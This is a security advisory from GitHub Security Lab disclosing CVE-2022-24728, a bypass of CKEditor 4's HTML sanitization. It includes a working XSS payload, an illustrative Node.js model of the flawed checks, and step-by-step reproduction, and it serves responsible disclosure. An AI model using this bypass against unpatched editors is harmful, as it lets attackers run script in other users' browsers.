Coordinated Disclosure Timeline
- 2022-01-28: Sent report to security@cksource.com
- 2022-01-31: Reply from security@cksource.com, acknowledging the issue. They plan to fix it in version 4.17.3.
- 2022-03-01: GitHub Security Advisory created.
- 2022-03-08: Fixed
- 2022-03-16: Version 4.18.0 released.
Summary
The HTML content sanitization in ckeditor4 can be bypassed, enabling JavaScript code to be executed (in the browser). Note: this vulnerability is very similar to CVE-2021-41165, and uses the same attack vector.
Product
ckeditor4
Tested Version
4.17.1
Details
Issue: Content sanitization bypass (GHSL-2022-009)
ckeditor4 has a “Source” button, which allows the user to toggle between WYSIWYG editing and a raw HTML editing mode. When the user toggles back to WYSIWYG mode after editing the raw HTML, ckeditor4 tries to sanitize the HTML to prevent the user from inserting any executable JavaScript into the webpage. The sanitization logic has recently been improved to fix previous vulnerabilities such as CVE-2021-41165, but it is still possible to bypass it. I was able to bypass the sanitization by entering the following HTML:
<p data-cke-filter="off"><script>alert();cke_temp(comment)</script></p>
There are two parts to this bypass:
First, the string “cke_temp(comment)” is included so that the matched script element passes the regex test in this check:
// Avoid protecting over protected, e.g. /\{.*?\}/
return ( /cke_temp(comment)?/ ).test( match ) ? match : '<!--{cke_temp}' + ( protectedHtml.push( match ) - 1 ) + '-->';
The check is intended to avoid protecting a placeholder that is already protected (the regex accepts either a cke_temp or a cke_tempcomment marker), but it tests the whole matched string, so the literal text inside the script body satisfies it as well. The match is therefore returned unchanged, and ckeditor4 never wraps the script element in a {cke_protected} comment.
Second, the data-cke-filter attribute triggers an early return here, so neither the <p> element nor the script element inside it is filtered:
// Do not filter element with data-cke-filter="off" and all their descendants.
if ( el.attributes[ 'data-cke-filter' ] == 'off' )
return false;
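The following Node.js model is an added illustration, not code from the advisory or from CKEditor: it reproduces the two steps in simplified form, a protectElements-style pass that swaps script elements for placeholder comments, followed by a tree filter with the data-cke-filter early return. The tokenizer, the script regex, the placeholder format and the single "drop script elements" filter rule are assumptions made for the example; only the two quoted checks come from CKEditor. Running the three constructed inputs shows why both halves of the payload are needed: a plain script is protected, the cke_temp(comment) trick alone escapes protection but is then filtered, and only the combination survives to the editable DOM.

```javascript
'use strict';

// Toy model of the two CKEditor 4 processing steps described above.
// Illustrative code written for this page, not CKEditor's implementation:
// the regexes, the parser and the filter rule are simplified assumptions.

// Step 1 (assumed simplified protectElements): swap each <script> element
// for a placeholder comment before parsing, unless the match already looks
// like a placeholder. The test on the match is the one quoted above; it
// also fires on the literal text "cke_temp(comment)" inside a script body.
function protectScripts(html, protectedHtml) {
  return html.replace(/<script[^>]*>[\s\S]*?<\/script>/gi, function (match) {
    return /cke_temp(comment)?/.test(match)
      ? match
      : '<!--{cke_temp}' + (protectedHtml.push(match) - 1) + '-->';
  });
}

// Minimal tokenizer for the tag subset needed here (double-quoted
// attributes only, no entities). Builds a tree of
// { name, attributes, children } elements plus #text / #comment leaves.
function parse(html) {
  const root = { name: '#root', attributes: {}, children: [] };
  const stack = [root];
  const token = /<!--[\s\S]*?-->|<\/([a-zA-Z][\w-]*)\s*>|<([a-zA-Z][\w-]*)((?:\s+[\w-]+(?:="[^"]*")?)*)\s*\/?>|[^<]+/g;
  let m;
  while ((m = token.exec(html)) !== null) {
    const top = stack[stack.length - 1];
    if (m[0].startsWith('<!--')) {
      top.children.push({ name: '#comment', value: m[0] });
    } else if (m[1]) {                       // closing tag
      if (stack.length > 1) stack.pop();
    } else if (m[2]) {                       // opening tag
      const attributes = {};
      const attr = /([\w-]+)="([^"]*)"/g;
      let a;
      while ((a = attr.exec(m[3])) !== null) attributes[a[1]] = a[2];
      const el = { name: m[2].toLowerCase(), attributes, children: [] };
      top.children.push(el);
      if (!m[0].endsWith('/>')) stack.push(el);
    } else {
      top.children.push({ name: '#text', value: m[0] });
    }
  }
  return root;
}

// Step 2 (assumed simplified content filter): the only rule is "drop
// <script> elements". The early return for data-cke-filter="off" is the
// one quoted above; returning false skips the element and its subtree.
function filterElement(el) {
  if (el.attributes['data-cke-filter'] === 'off') return false;
  el.children = el.children.filter(child => child.name !== 'script');
  for (const child of el.children) {
    if (child.children) filterElement(child);
  }
  return true;
}

function serialize(node) {
  if (!node.children) return node.value;
  const inner = node.children.map(serialize).join('');
  if (node.name === '#root') return inner;
  const attrs = Object.entries(node.attributes)
    .map(([k, v]) => ' ' + k + '="' + v + '"').join('');
  return '<' + node.name + attrs + '>' + inner + '</' + node.name + '>';
}

// Source -> WYSIWYG conversion as modelled here: protect, parse, filter, serialize.
function toWysiwygHtml(source) {
  const protectedHtml = [];
  const tree = parse(protectScripts(source, protectedHtml));
  filterElement(tree);
  return { html: serialize(tree), protectedHtml };
}

// Check to run over the output: a script element that reaches the
// editable DOM is exactly the condition the advisory reproduces.
function containsScriptElement(html) {
  return /<script[\s>]/i.test(html);
}

// Constructed inputs: a plain script, the cke_temp(comment) trick alone,
// and the full payload from the advisory.
const SAMPLES = {
  plain: '<p><script>alert()</script></p>',
  unprotected: '<p><script>alert();cke_temp(comment)</script></p>',
  bypass: '<p data-cke-filter="off"><script>alert();cke_temp(comment)</script></p>',
};

for (const [name, source] of Object.entries(SAMPLES)) {
  const out = toWysiwygHtml(source);
  console.log(name, '->', out.html, '| live script:', containsScriptElement(out.html));
}
```

The plain sample comes out as `<p><!--{cke_temp}0--></p>` with the script stored in protectedHtml; the unprotected sample escapes step 1 but the filter reduces it to `<p></p>`; only the bypass sample is returned verbatim, with a live script element.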
Full reproduction steps
git clone https://github.com/ckeditor/ckeditor4.git
cd ckeditor4
git checkout 4.17.1
Open ckeditor4/samples/index.html in a browser.
Click the “Source” button.
Replace the raw HTML with this:
<p data-cke-filter="off"><script>alert();cke_temp(comment)</script></p>
Click the “Source” button.
You should see an alert popup.
Impact
This issue could enable an attacker to bypass the sanitization logic and inject JavaScript code.
CVE
- CVE-2022-24728
Credit
This issue was discovered and reported by GHSL team member @kevinbackhouse (Kevin Backhouse). Also, many thanks to @wbowling (William Bowling) for helping us with additional technical details about CVE-2021-41165.
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2022-009 in any communication regarding this issue.